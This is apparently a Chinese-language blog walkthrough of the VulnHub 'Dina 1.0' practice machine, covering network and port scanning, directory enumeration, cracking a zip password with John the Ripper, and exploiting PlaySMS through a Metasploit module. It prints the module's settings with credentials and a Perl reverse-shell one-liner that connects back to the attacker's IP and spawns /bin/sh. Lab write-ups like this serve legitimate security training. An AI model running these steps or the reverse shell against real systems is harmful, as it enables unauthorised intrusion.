靶场渗透练习(一):Dina1.0

625 阅读2分钟

一、靶场信息

下载链接:www.vulnhub.com/entry/dina-…

修改网络适配器为 NAT 模式

注意:

使用了VMWare虚拟机

若操作过程中有出错,可能因为目标机挂起或其他原因导致服务没有启动或ip更换

可以重启目标机重新进行主机存活扫描

参考链接:

www.freesion.com/article/624…

www.freebuf.com/column/1935…

www.cnblogs.com/yuzly/p/108…

二、渗透流程

  1. 发现主机

    查看kali攻击机所在网段

    扫描网段内存活主机,确定主机ip为 192.168.137.129

    -i 指定要监听的网卡

    -r 指定ip段

  2. 端口扫描(masscan+nmap组合拳)

    使用 masscan 扫描得到开放的 80 端口

    --rate 指定扫描速率

    -p 指定端口扫描范围

    使用 nmap 查看端口服务

    -sV 探测开启的端口来获取服务、版本信息

    -T<0-5> 设置时序模块,越高速度越快

    -O 进行系统探测

    -p 进行指定端口的探测

  3. 访问80端口开放的web服务

  4. 扫描目录

    使用 御剑 进行扫描

    或者

    使用 dirb

  5. 访问扫描的目录

    secure/ 下有一个压缩包

  6. 破解压缩包密码,提取的文件不能正常使用

    用系统播放器打开,不要用网易云,就算不能开这家伙还是要假装能载入的样子

  • 思路1:在http://192.168.137.129/nothing/源码中有记录密码

  • 思路2:使用 John The Ripper 爆破工具干它

    1. zip2john 生成中间文件

    2. john 破解密码,获得密码 freedom 命令如下:

      john --format=zip Desktop/backup.john --wordlist=Desktop/500-worst-passwords.txt
      

​ 提取后发现文件不能正常打开

  1. 使用编辑器打开

    发现有提示url和用户名

    sublime Text真滴香,插件又多又好看

  2. 访问获取的url

    未知密码,需要进行破解

    查看源码,里面有注释

    未能登陆成功

    结果是密码在nothing页面中

    diana

  3. 发现后台使用playsms系统,扫描漏洞

    使用 matesploit工具扫描

    (1) 使用 msfconsole进入控制面板

    (2)search playsms查找相关漏洞

    (3)use exploit/multi/http/playsms_filename_exec使用漏洞

    文件上传位于该页面

    (4)show options查看参数设置

    (5)参数配置

    set PASSWORD diana
    set USERNAME touhid
    set TARGETURI SecreTSMSgatwayLogin(TARGETURI是上传文件页面的URI)
    set RHOST 192.168.137.129(靶机ip)
    set LHOST 192.168.137.128(kali监听机的ip)
    

(6)使用 exploit 执行成功,获取meterpreter权限

(7)新建终端启动 netcat 监听器,尝试从目标机器反弹shell

-n 直接使用ip,不通过域名服务器

-v 显示执行过程

-p 指定端口

-l 使用监听模式,监控传入资源

(8)在 metasploit 控制台通过perl写入反向shell, 查看nc发现连接shell成功

sudo perl -e 'use Socket;$i="192.168.137.128";$p=1235;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

(9)获取flag

—— 被幸运砸到头的2020年底